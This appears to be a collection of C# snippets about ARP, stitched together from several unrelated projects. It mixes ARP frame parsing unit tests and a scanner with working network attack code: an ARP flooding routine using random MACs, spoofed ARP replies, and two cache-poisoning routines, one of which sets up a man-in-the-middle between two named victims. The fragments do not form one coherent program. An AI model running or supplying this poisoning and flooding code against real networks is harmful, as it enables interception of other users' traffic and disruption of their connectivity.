/// <summary>
/// Checks a frame for ARP requests and handles the ARP request
/// </summary>
/// <param name="fFrame">The frame to check for ARP requests</param>
protected void HandleARP(Frame fFrame)
{
ARPFrame arpFrame = GetARPFrame(fFrame);
if (arpFrame != null && arpFrame.Operation == ARPOperation.Request && base.ContainsAddress(arpFrame.DestinationIP))
{
EthernetFrame ethReplyFrame = new EthernetFrame();
ethReplyFrame.Destination = arpFrame.SourceMAC;
ethReplyFrame.Source = this.PrimaryMACAddress;
ethReplyFrame.EtherType = EtherType.ARP;
ARPFrame arpReplyFrame = new ARPFrame();
arpReplyFrame.SourceIP = arpFrame.DestinationIP;
arpReplyFrame.SourceMAC = this.macprimarySpoofAddress;
arpReplyFrame.DestinationMAC = arpFrame.SourceMAC;
arpReplyFrame.DestinationIP = arpFrame.SourceIP;
arpReplyFrame.Operation = ARPOperation.Reply;
arpReplyFrame.HardwareAddressType = HardwareAddressType.Ethernet;
arpReplyFrame.ProtocolAddressType = EtherType.IPv4;
ethReplyFrame.EncapsulatedFrame = arpReplyFrame;
this.Send(ethReplyFrame);
}
}
/// <summary>
/// Analyzes the input frame for new information.
/// </summary>
/// <param name="fInputFrame">The frame to analyze</param>
protected override void HandleTraffic(Frame fInputFrame)
{
ARPFrame arpFrame = GetARPFrame(fInputFrame);
Ethernet.EthernetFrame ethFrame = GetEthernetFrame(fInputFrame);
IP.IPFrame ipFrame = GetIPv4Frame(fInputFrame);
if (arpFrame != null)
{
if (arpFrame.Operation == ARPOperation.Request)
{
ProcessAdresses(arpFrame.SourceIP, arpFrame.SourceMAC);
}
if (arpFrame.Operation == ARPOperation.Reply)
{
ProcessAdresses(arpFrame.SourceIP, arpFrame.SourceMAC);
}
}
if (ethFrame != null && ipFrame != null)
{
ProcessAdresses(ipFrame.SourceAddress, null);
ProcessAdresses(ipFrame.DestinationAddress, null);
}
}
public void Attack(uint frameCount)
{
EthernetFrame ethFrame;
ARPFrame arpFrame;
for (uint i = 0; i < frameCount; i++)
{
foreach (EthernetInterface ipi in lInterfaces)
{
MACAddress sourceMAC = MACAddress.Random;
ethFrame = new EthernetFrame();
ethFrame.CanocialFormatIndicator = false;
ethFrame.Destination = MACAddress.Broadcast;
ethFrame.Source = sourceMAC;
ethFrame.VlanTagExists = false;
ethFrame.EtherType = EtherType.ARP;
arpFrame = new ARPFrame();
arpFrame.DestinationIP = new IPAddress(0);
arpFrame.DestinationMAC = MACAddress.Random;
arpFrame.SourceIP = IPAddress.Parse("0.0.0.0");
arpFrame.SourceMAC = sourceMAC;
arpFrame.ProtocolAddressType = EtherType.IPv4;
arpFrame.HardwareAddressType = HardwareAddressType.Ethernet;
arpFrame.Operation = ARPOperation.Reply;
ethFrame.EncapsulatedFrame = arpFrame;
ipi.Send(ethFrame);
}
}
}
public void Get()
{
var arpFrame = new ARPFrame
{
Bytes = new Byte[28]
};
arpFrame.SetBytes(24, 4, new Byte[] { 0xC0, 0xA8, 0x01, 0x01 });
arpFrame.TargetIPAddress.ToString().Should().Be("192.168.1.1");
}
public void Get(Byte[] input, ARPOperationCode expected)
{
var arpFrame = new ARPFrame
{
Bytes = new Byte[28]
};
arpFrame.SetBytes(6, 2, input);
arpFrame.OperationCode.Should().Be(expected);
}
public void Get()
{
var arpFrame = new ARPFrame
{
Bytes = new Byte[28]
};
arpFrame.SetBytes(18, 6, new Byte[] { 0x12, 0x34, 0x56, 0x78, 0x9A, 0xBC });
arpFrame.TargetMACAddress.ToString().Should().Be("12:34:56:78:9A:BC");
}
public void Get(Byte input, Byte expected)
{
var arpFrame = new ARPFrame
{
Bytes = new Byte[28]
};
arpFrame.SetByte(4, input);
arpFrame.HardwareAddressLength.Should().Be(expected);
}
public void Set(Byte expected, Byte input)
{
var arpFrame = new ARPFrame
{
Bytes = new Byte[28]
};
arpFrame.ProtocolAddressLength = input;
arpFrame.GetByte(5).Should().Equals(expected);
arpFrame.ProtocolAddressLength.Should().Be(expected);
}
/// <summary>
/// Receives an ARP frame from the ARP scan task and pushes it to the out queue of the according interface
/// </summary>
/// <param name="fInputFrame">The frame to receive</param>
protected override void HandleTraffic(Frame fInputFrame)
{
ARPFrame fARPFrame = this.GetARPFrame(fInputFrame);
if (fARPFrame != null)
{
foreach (EthernetInterface ipi in GetInterfacesForAddress(fARPFrame.DestinationIP))
{
ipi.Send(fARPFrame, fARPFrame.DestinationIP, EtherType.ARP);
}
}
}
public void Set(Byte[] expected, EthernetFrameType input)
{
var arpFrame = new ARPFrame
{
Bytes = new Byte[28]
};
arpFrame.ProtocolType = input;
arpFrame.GetBytes(2, 2).ToArray().Should().Equal(expected);
arpFrame.ProtocolType.Should().Be(input);
}
public void Get()
{
var arpFrame = new ARPFrame
{
Bytes = new Byte[28]
};
arpFrame[14, 4] = new Byte[] { 0xC0, 0xA8, 0x01, 0x02 };
arpFrame.SenderIPAddress.ToString().Should().Be("192.168.1.2");
}
public void Set(Byte[] expected, HardwareType input)
{
var arpFrame = new ARPFrame
{
Bytes = new Byte[28]
};
arpFrame.HardwareType = input;
arpFrame.GetBytes(0, 2).ToArray().Should().Equal(expected);
arpFrame.HardwareType.Should().Be(input);
}
public void Set(Byte[] expected, ARPOperationCode input)
{
var arpFrame = new ARPFrame
{
Bytes = new Byte[28]
};
arpFrame.OperationCode = input;
arpFrame.GetBytes(6, 2).ToArray().Should().Equal(expected);
arpFrame.OperationCode.Should().Be(input);
}
public void Get(Byte[] input, HardwareType expected)
{
var arpFrame = new ARPFrame
{
Bytes = new Byte[28]
};
arpFrame.SetBytes(0, 2, input);
arpFrame.HardwareType.Should().Be(expected);
}
public void Get(Byte[] input, EthernetFrameType expected)
{
var arpFrame = new ARPFrame
{
Bytes = new Byte[28]
};
arpFrame.SetBytes(2, 2, input);
arpFrame.ProtocolType.Should().Be(expected);
}
protected override void Scan(IPAddress ipaDestination)
{
ARPFrame arpFrame = new ARPFrame();
arpFrame.DestinationIP = ipaDestination;
arpFrame.SourceIP = SourceAddress;
arpFrame.DestinationMAC = MACAddress.Parse("ff:ff:ff:ff:ff:ff");
arpFrame.SourceMAC = macLocal;
arpFrame.ProtocolAddressType = EtherType.IPv4;
arpFrame.HardwareAddressType = HardwareAddressType.Ethernet;
arpFrame.Operation = ARPOperation.Request;
OutputHandler.PushTraffic(arpFrame);
}
public void Set()
{
var arpFrame = new ARPFrame
{
Bytes = new Byte[28]
};
arpFrame.SenderMACAddress = new MACAddress
{
Bytes = new Byte[] { 0x21, 0x43, 0x65, 0x87, 0xA9, 0xCB }
};
arpFrame.SenderMACAddress.ToString().Should().Be("21:43:65:87:A9:CB");
}
public void arp_request_frame()
{
var arpFrame = new ARPFrame
{
Bytes = buildARPBytes()
};
arpFrame.HardwareType.Should().Be(HardwareType.Ethernet);
arpFrame.ProtocolType.Should().Be(EthernetFrameType.IPv4);
arpFrame.HardwareAddressLength.Should().Be(6);
arpFrame.ProtocolAddressLength.Should().Be(4);
arpFrame.OperationCode.Should().Be(ARPOperationCode.Request);
arpFrame.SenderMACAddress.ToString().Should().Be("12:34:56:78:9A:BC");
arpFrame.SenderIPAddress.ToString().Should().Be("192.168.1.2");
arpFrame.TargetMACAddress.ToString().Should().Be("00:00:00:00:00:00");
arpFrame.TargetIPAddress.ToString().Should().Be("192.168.1.1");
}
private void Poison()
{
EthernetFrame ethFrame;
ARPFrame arpFrame;
lock (ipaToIsolate)
{
foreach (ARPHostEntry heToIsolate in ipaToIsolate)
{
lock (ipaToSpoof)
{
foreach (ARPHostEntry heToSpoof in ipaToSpoof)
{
if (heToIsolate != heToSpoof)
{
ethFrame = new EthernetFrame();
ethFrame.CanocialFormatIndicator = false;
ethFrame.Destination = heToIsolate.MAC;
ethFrame.Source = macAddressRedirectTo;
ethFrame.VlanTagExists = false;
ethFrame.EtherType = EtherType.ARP;
arpFrame = new ARPFrame();
arpFrame.DestinationIP = heToIsolate.IP;
arpFrame.DestinationMAC = MACAddress.Parse("00:00:00:00:00:00");
arpFrame.SourceIP = heToSpoof.IP;
arpFrame.SourceMAC = macAddressRedirectTo;
arpFrame.ProtocolAddressType = EtherType.IPv4;
arpFrame.HardwareAddressType = HardwareAddressType.Ethernet;
arpFrame.Operation = ARPOperation.Request;
ethFrame.EncapsulatedFrame = arpFrame;
wpc.SendPacket(ethFrame.FrameBytes);
}
}
}
}
}
}
private void Poison()
{
EthernetFrame ethFrame;
ARPFrame arpFrame;
lock (lVictims)
{
foreach (EthernetInterface ipi in lInterfaces)
{
foreach (MITMAttackEntry aprVictim in lVictims)
{
if (!ipi.ARPTable.Contains(aprVictim.VictimBob) || !ipi.ARPTable.Contains(aprVictim.VictimAlice))
{
continue;
}
//Poisoning Victim 1
ethFrame = new EthernetFrame();
ethFrame.CanocialFormatIndicator = false;
ethFrame.Destination = ipi.ARPTable.GetEntry(aprVictim.VictimBob).MAC;
ethFrame.Source = ipi.PrimaryMACAddress;
ethFrame.VlanTagExists = false;
ethFrame.EtherType = EtherType.ARP;
arpFrame = new ARPFrame();
arpFrame.DestinationIP = aprVictim.VictimBob;
if (aprMethod == APRAttackMethod.UseRequestPackets)
{
arpFrame.DestinationMAC = MACAddress.Parse("00:00:00:00:00:00");
}
else
{
arpFrame.DestinationMAC = ipi.ARPTable.GetEntry(aprVictim.VictimBob).MAC;
}
arpFrame.SourceIP = aprVictim.VictimAlice;
arpFrame.SourceMAC = ipi.PrimaryMACAddress;
arpFrame.ProtocolAddressType = EtherType.IPv4;
arpFrame.HardwareAddressType = HardwareAddressType.Ethernet;
if (aprMethod == APRAttackMethod.UseRequestPackets)
{
arpFrame.Operation = ARPOperation.Request;
}
else
{
arpFrame.Operation = ARPOperation.Reply;
}
ethFrame.EncapsulatedFrame = arpFrame;
ipi.Send(ethFrame);
//Poisoning Victim 2
ethFrame = new EthernetFrame();
ethFrame.CanocialFormatIndicator = false;
ethFrame.Destination = ipi.ARPTable.GetEntry(aprVictim.VictimAlice).MAC;
ethFrame.Source = ipi.PrimaryMACAddress;
ethFrame.VlanTagExists = false;
ethFrame.EtherType = EtherType.ARP;
arpFrame = new ARPFrame();
arpFrame.DestinationIP = aprVictim.VictimAlice;
if (aprMethod == APRAttackMethod.UseRequestPackets)
{
arpFrame.DestinationMAC = MACAddress.Parse("00:00:00:00:00:00");
}
else
{
arpFrame.DestinationMAC = ipi.ARPTable.GetEntry(aprVictim.VictimAlice).MAC;
}
arpFrame.SourceIP = aprVictim.VictimBob;
arpFrame.SourceMAC = ipi.PrimaryMACAddress;
arpFrame.ProtocolAddressType = EtherType.IPv4;
arpFrame.HardwareAddressType = HardwareAddressType.Ethernet;
if (aprMethod == APRAttackMethod.UseRequestPackets)
{
arpFrame.Operation = ARPOperation.Request;
}
else
{
arpFrame.Operation = ARPOperation.Reply;
}
ethFrame.EncapsulatedFrame = arpFrame;
ipi.Send(ethFrame);
}
}
}
InvokePoisoned();
}
public void Display(ARPFrame arpFrame)
{
NewLine($"arp : {arpFrame.SenderMACAddress,-17} {arpFrame.SenderIPAddress,-15} > {arpFrame.TargetMACAddress,17} {arpFrame.TargetIPAddress,-15} operation_code={arpFrame.OperationCode}");
}
